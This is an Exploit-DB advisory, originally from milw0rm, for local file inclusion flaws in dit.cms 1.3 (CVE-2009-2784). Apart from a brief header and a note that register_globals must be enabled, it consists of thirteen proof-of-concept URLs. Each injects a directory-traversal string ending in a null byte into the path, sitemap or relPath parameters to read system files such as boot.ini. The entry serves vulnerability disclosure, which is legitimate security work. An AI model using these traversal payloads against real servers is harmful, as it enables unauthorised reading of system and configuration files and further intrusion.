dit.cms 1.3 path/sitemap/relPath Local File Inclusion Vulnerabilities

2009-07-30T00:00:00
ID EDB-ID:9310
Type exploitdb
Reporter SirGod
Modified 2009-07-30T00:00:00

Description

dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities. CVE-2009-2784. Webapps exploit for php platform

                                        
                                            ##########################################################################################################
[+] dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##########################################################################################################

[+] Homepage : http://ditcms.org/

[+] Local File Inclusion

 - Note : register_globals = on

 - Vulnerable code is everywhere

 - PoC's

    http://127.0.0.1/path/install/index.php?path=../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/left_rightslideopen/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/left_rightslideopen/index.php?sitemap=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/side_pullout/index.php?sitemap=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/side_pullout/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/side_slideopen/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/side_slideopen/index.php?sitemap=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/simple/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/top_dropdown/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/top_dropdown/index.php?sitemap=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/topside/index.php?sitemap=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/menus/topside/index.php?path=../../../../../../../../boot.ini%00

    http://127.0.0.1/path/index/index.php?relPath=../../../../../../boot.ini%00


##########################################################################################################

# milw0rm.com [2009-07-30]